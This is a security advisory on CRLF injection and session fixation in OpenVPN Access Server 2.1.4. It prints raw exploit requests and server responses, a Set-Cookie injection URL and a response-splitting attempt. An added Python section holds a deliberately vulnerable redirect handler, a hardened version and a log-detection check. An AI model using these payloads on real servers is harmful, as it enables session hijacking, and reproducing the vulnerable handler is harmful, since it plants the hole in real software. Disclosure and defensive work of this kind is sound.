OpenVPN Access Server is a full-featured secure network tunneling VPN software solution that integrates OpenVPN server capabilities, enterprise management capabilities, a simplified OpenVPN Connect UI, and OpenVPN Client software packages for Windows, macOS, Linux, Android, and iOS environments. OpenVPN Access Server supports a wide range of configurations, including secure and granular remote access to internal network and/or private cloud network resources and applications with fine-grained access control.
OpenVPN-AS (version 2.1.4) is prone to CRLF injection. Using the URL-encoded line feed character %0A, it is possible to inject headers and content into the server's response.
Furthermore, this vulnerability allows us to carry out a session fixation attack, because the session cookie is poorly handled during authentication.
We have not been able to exploit it, but the application may also be prone to HTTP Response Splitting attacks.
Exploiting these vulnerabilities, we were able to steal a session from a victim and then access the application (OpenVPN-AS) with that user's rights.
Exploiting this against an administrator account may lead to serious consequences.
It is possible to inject a CRLF character such as %0A using the URL https://www.mysite.com/__session_start__/, as in the following request:
GET /__session_start__/%0atest HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: openvpn_sess_******=******dc61
Pragma: no-cache
Cache-Control: no-cache
As a result, we obtained this response from the server:
HTTP/1.1 302 Found
Date: Wed, 18 Jan 2017 10:19:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Location: https://www.mysite.com/
test
Server: OpenVPN-AS
<html>
<body>
<p>REDIRECT</p>
</body>
</html>
Thus, the %0A character is taken into account, and we can clearly see the "test" string at an unexpected location.
Using the CRLF injection together with a problem during the authentication phase (the session cookie is not regenerated after login), we were able to successfully exploit a session fixation vulnerability.
In order to exploit this vulnerability, we followed the steps below.
As an example, we aim to inject a Set-Cookie header with a known value:
https://www.mysite.com/__session_start__/%0aSet-Cookie: openvpn_sess_******=******cf23; Path=/; Secure; HttpOnly
This URL allows the attacker to choose the value of the victim's session cookie; because the application keeps that value after authentication, the attacker then knows the victim's authenticated session identifier.
We also tried to exploit an HTTP Response Splitting attack, without success for now:
GET /__session_start__/%0aSet-Cookie:%20openvpn_sess_******=******ac42;%20Path=/%0aContent-Length:%200%0a%0aHTTP/1.1%20200%20OK%0aContent-Type:%20text/html%0aContent-Length:%2017%0a%0a<html>TEST</html> HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: openvpn_sess_******=******dc61
Pragma: no-cache
Cache-Control: no-cache
As we can see, it is possible to use the %0A character multiple times in order to forge a second response. The server answered as follows:
HTTP/1.1 302 Found
Date: Wed, 18 Jan 2017 10:29:23 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Location: https://www.mysite.com/
Set-Cookie: openvpn_sess_******=******ac42; Path=/
Content-Length: 0
Content-Length: 171
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 17
<html>TEST</html>
Server: OpenVPN-AS
3b
<html>
<body>
<p>REDIRECT</p>
</body>
</html>
0
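As an added example (not from this advisory and not OpenVPN-AS code), the following Python reconstructs the bug class behind the responses above: a redirect handler that splices the decoded request path into the Location header, its hardened counterpart that rejects line breaks, a small header parser that surfaces the injected Set-Cookie, and an access-log check that flags encoded line breaks on the session-start path. The handler names, the openvpn_sess_demo cookie and the log lines are constructed placeholders.

```python
import re
from urllib.parse import unquote

PREFIX = "/__session_start__/"
CRLF_RE = re.compile(r"[\r\n]")
# Percent-encoded CR or LF, including the double-encoded form (%250a).
ENCODED_CRLF_RE = re.compile(r"%(?:25)?0[aAdD]")

# Constructed sample input: the advisory's Set-Cookie payload with placeholder values.
SAMPLE_PATH = PREFIX + "%0aSet-Cookie:%20openvpn_sess_demo=attacker-chosen;%20Path=/"
# Constructed access-log lines (common log format), one hostile and one benign.
LOG_BAD = '203.0.113.5 - - [18/Jan/2017:10:19:46 +0000] "GET /__session_start__/%0atest HTTP/1.1" 302 59'
LOG_OK = '203.0.113.5 - - [18/Jan/2017:10:20:01 +0000] "GET /__session_start__/ HTTP/1.1" 302 59'


def vulnerable_redirect(base_url, request_path):
    """Build a 302 head the way a CRLF-vulnerable handler would: the decoded
    request tail is concatenated straight into the header block. This is a
    hypothetical reconstruction of the bug class, not OpenVPN-AS code."""
    tail = unquote(request_path[len(PREFIX):])
    return ("HTTP/1.1 302 Found\r\nLocation: " + base_url + "/" + tail
            + "\r\nServer: demo\r\n\r\n")

def safe_header_value(value):
    """Hardened form: a header value may never contain a line break. Rejecting
    beats stripping, which can silently splice attacker text into the header."""
    if CRLF_RE.search(value):
        raise ValueError("CR/LF in header value")
    return value

def hardened_redirect(base_url, request_path):
    tail = unquote(request_path[len(PREFIX):])
    location = safe_header_value(base_url + "/" + tail)
    return "HTTP/1.1 302 Found\r\nLocation: " + location + "\r\nServer: demo\r\n\r\n"

def header_names(raw_head):
    """Parse a response head (tolerating bare LF, as browsers do) and return its
    header names; an injected Set-Cookie shows up although the app never set it."""
    lines = re.split(r"\r?\n", raw_head)[1:]
    return [line.split(":", 1)[0] for line in lines if ":" in line]

def is_suspicious_request(log_line):
    """Detection over one access-log line: flag a session-start request whose
    path carries an encoded line break, which no legitimate client sends."""
    m = re.search(r'"(?:GET|POST) (\S+)', log_line)
    return bool(m and m.group(1).startswith(PREFIX)
                and ENCODED_CRLF_RE.search(m.group(1)))
```

Run the vulnerable and hardened handlers on SAMPLE_PATH to see the injected header appear in one and a ValueError in the other.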
The vendor has not provided a patch for this vulnerability. However, several mitigations can be applied:
From the vendor side, several steps need to be taken: